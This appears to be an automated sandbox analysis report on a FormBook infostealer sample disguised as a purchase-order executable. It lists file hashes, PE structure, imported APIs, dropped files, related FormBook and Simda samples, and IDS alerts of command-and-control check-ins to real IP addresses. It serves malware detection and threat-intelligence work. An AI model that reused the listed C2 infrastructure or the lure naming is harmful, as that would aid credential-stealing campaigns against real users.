CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 47.57.185.227
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | PROPOSTA CONTRATTUALE.msg | malicious | HTMLPhisher | 47.246.131.28
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | Payment confirmation 20240911.exe | malicious | FormBook | 172.96.191.39
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 172.96.191.39
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | Doc_PO6900000827.exe | malicious | FormBook | 172.96.191.39
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | OjKmJJm2YT.exe | malicious | Simda Stealer | 103.150.11.230
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | 5AFlyarMds.exe | malicious | Simda Stealer | 103.150.11.230
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | uB31aJH4M0.exe | malicious | Simda Stealer | 103.150.11.230
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | PO_20240906011824.exe | malicious | FormBook | 172.96.191.39
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | doc330391202408011.exe | malicious | FormBook | 172.96.191.39
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | PO #86637.exe | malicious | FormBook | 172.96.191.39
LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG | REQST_PRC 410240665_2024.exe | malicious | FormBook | 172.96.191.39
                    No context
                    No context
                    Process:C:\Windows\SysWOW64\RMActivate_ssp.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288768
                    Entropy (8bit):7.994171345784413
                    Encrypted:true
                    SSDEEP:6144:TPWqJJeEuOi/5Gv8DCofKpFZAG6SAzz9XLh97ur4WDG10b:TxcOi0ofKZ6Hn9f6GC
                    MD5:A16E4A19F12A06AE5F763EE553E3D723
                    SHA1:7563DAE4EA5F2062DDD89E10C58D61F463B8F5A3
                    SHA-256:C9938611C4682E86E63C2B5D27E7CBF56C53B738D029E3606D7655C523176F49
                    SHA-512:75A8168CCF617FFECA36CC81827B85E95A999B00A50B888CCE67152A250BFF46C4FFA460FBA23807EC2A6C000819BDE2DB13250758AA7D54AD11777E625CD86F
                    Malicious:false
                    Reputation:low
                    Preview:.....J9J7...P....f.V@...b4_...D3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7.BMYJ,.6Z._.g.8..v.%07.(J5-$"+jZ+Y9-9y&VxJ/$v*(j}.dw/"=!.U5PnVCFJ9J7.CD.yS?.g*1.{*^.-..c$T."...&-.P...q9#..Q9"k#!.9J7WBMYDc.8Z.WBF.v1UWBMYD3X8.JTBMK2J7.FMYD3X8ZJV.RJ9J'WBM)@3X8.JVSFJ9H7WDMYD3X8ZLVCFJ9J7W2IYD1X8ZJVCDJy.7WRMYT3X8ZZVCVJ9J7WB]YD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9dC2:9YD3.m^JVSFJ9.3WB]YD3X8ZJVCFJ9J7wBM9D3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD
                    Process:C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288768
                    Entropy (8bit):7.994171345784413
                    Encrypted:true
                    SSDEEP:6144:TPWqJJeEuOi/5Gv8DCofKpFZAG6SAzz9XLh97ur4WDG10b:TxcOi0ofKZ6Hn9f6GC
                    MD5:A16E4A19F12A06AE5F763EE553E3D723
                    SHA1:7563DAE4EA5F2062DDD89E10C58D61F463B8F5A3
                    SHA-256:C9938611C4682E86E63C2B5D27E7CBF56C53B738D029E3606D7655C523176F49
                    SHA-512:75A8168CCF617FFECA36CC81827B85E95A999B00A50B888CCE67152A250BFF46C4FFA460FBA23807EC2A6C000819BDE2DB13250758AA7D54AD11777E625CD86F
                    Malicious:false
                    Reputation:low
                    Preview:.....J9J7...P....f.V@...b4_...D3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7.BMYJ,.6Z._.g.8..v.%07.(J5-$"+jZ+Y9-9y&VxJ/$v*(j}.dw/"=!.U5PnVCFJ9J7.CD.yS?.g*1.{*^.-..c$T."...&-.P...q9#..Q9"k#!.9J7WBMYDc.8Z.WBF.v1UWBMYD3X8.JTBMK2J7.FMYD3X8ZJV.RJ9J'WBM)@3X8.JVSFJ9H7WDMYD3X8ZLVCFJ9J7W2IYD1X8ZJVCDJy.7WRMYT3X8ZZVCVJ9J7WB]YD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9dC2:9YD3.m^JVSFJ9.3WB]YD3X8ZJVCFJ9J7wBM9D3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD3X8ZJVCFJ9J7WBMYD
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.163255002363799
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:Purchase Order TE- 00011-7777.exe
                    File size:1'227'264 bytes
                    MD5:74e3ad61908355d646036b6b13a20916
                    SHA1:e6b0b4c0ce1cda9218c81d4453b8101745237149
                    SHA256:786448ef89e10b1b440d5c189417acb59a45d5e87e46aa6dc33c015132c46704
                    SHA512:4253b00ec58860918e84e2f0dba421dbfd50411a619e3ea635777236bd6a4e84af0bc8438a9346c60367c00383f03c8932848db83572aea4550706b86098ea5d
                    SSDEEP:24576:o4lavt0LkLL9IMixoEgeaS32JOcXMowJZ2jhWtYq9MmCS:/kwkn9IMHeaSYOce2F5aPCS
                    TLSH:3345C01373DDC3A1C3725273BA65BB01AEBB7C2506A1F59B2FD4093DE920162921E673
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........
                    Icon Hash:aaf3e3e3938382a0
                    Entrypoint:0x426bf7
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66E24D24 [Thu Sep 12 02:08:36 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:bbac62fd99326ea68ec5a33b36925dd1
                    Instruction
                    call 00007F2870C7A60Ch
                    jmp 00007F2870C6D4F4h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push edi
                    push esi
                    mov esi, dword ptr [esp+10h]
                    mov ecx, dword ptr [esp+14h]
                    mov edi, dword ptr [esp+0Ch]
                    mov eax, ecx
                    mov edx, ecx
                    add eax, esi
                    cmp edi, esi
                    jbe 00007F2870C6D67Ah
                    cmp edi, eax
                    jc 00007F2870C6D9DEh
                    bt dword ptr [004C0158h], 01h
                    jnc 00007F2870C6D679h
                    rep movsb
                    jmp 00007F2870C6D98Ch
                    cmp ecx, 00000080h
                    jc 00007F2870C6D844h
                    mov eax, edi
                    xor eax, esi
                    test eax, 0000000Fh
                    jne 00007F2870C6D680h
                    bt dword ptr [004BA370h], 01h
                    jc 00007F2870C6DB50h
                    bt dword ptr [004C0158h], 00000000h
                    jnc 00007F2870C6D81Dh
                    test edi, 00000003h
                    jne 00007F2870C6D82Eh
                    test esi, 00000003h
                    jne 00007F2870C6D80Dh
                    bt edi, 02h
                    jnc 00007F2870C6D67Fh
                    mov eax, dword ptr [esi]
                    sub ecx, 04h
                    lea esi, dword ptr [esi+04h]
                    mov dword ptr [edi], eax
                    lea edi, dword ptr [edi+04h]
                    bt edi, 03h
                    jnc 00007F2870C6D683h
                    movq xmm1, qword ptr [esi]
                    sub ecx, 08h
                    lea esi, dword ptr [esi+08h]
                    movq qword ptr [edi], xmm1
                    lea edi, dword ptr [edi+08h]
                    test esi, 00000007h
                    je 00007F2870C6D6D5h
                    Programming Language:
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [ASM] VS2012 UPD4 build 61030
                    • [RES] VS2012 UPD4 build 61030
                    • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb6b6c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x62508 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x127000 | 0x6c20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2770 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x858 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8be74 | 0x8c000 | 74af66fa540568c59b3868e78900e476 | False | 0.5690970284598215 | data | 6.681489717174931 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2c76a | 0x2c800 | 576c856afaad699ad9fe099fc6a9ce33 | False | 0.33122476299157305 | zlib compressed data | 5.781163507108141 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9f34 | 0x6200 | e6d2e204147f7cdc3055011093632f54 | False | 0.1639030612244898 | data | 2.004392861291539 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x62508 | 0x62600 | bcc00f8079d8a6a14864c1cf7953aafd | False | 0.9332016359593392 | data | 7.905350495306896 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0xa462 | 0xa600 | c2f6ddaeef894b7510c3be928eeae5dd | False | 0.5080948795180723 | data | 5.238496692777452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x597b3 | data | | | 1.0003301365564847
RT_GROUP_ICON | 0x125f6c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x125fe4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x125ff8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x12600c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x126020 | 0x138 | data | English | Great Britain | 0.592948717948718
RT_MANIFEST | 0x126158 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
USER32.dll | CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-12T13:02:39.719355+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49711 | 47.57.185.227 | 80 | TCP
2024-09-12T13:03:03.101506+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49716 | 89.58.49.1 | 80 | TCP
2024-09-12T13:03:24.935270+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49721 | 154.23.184.240 | 80 | TCP
2024-09-12T13:03:38.544416+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49725 | 85.159.66.93 | 80 | TCP
2024-09-12T13:03:51.946841+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49729 | 185.173.111.76 | 80 | TCP
2024-09-12T13:04:05.250629+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49733 | 203.161.43.228 | 80 | TCP
2024-09-12T13:04:18.731382+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49737 | 161.97.168.245 | 80 | TCP
2024-09-12T13:04:32.719913+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49741 | 172.96.191.39 | 80 | TCP
2024-09-12T13:04:46.013073+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49745 | 104.21.20.125 | 80 | TCP
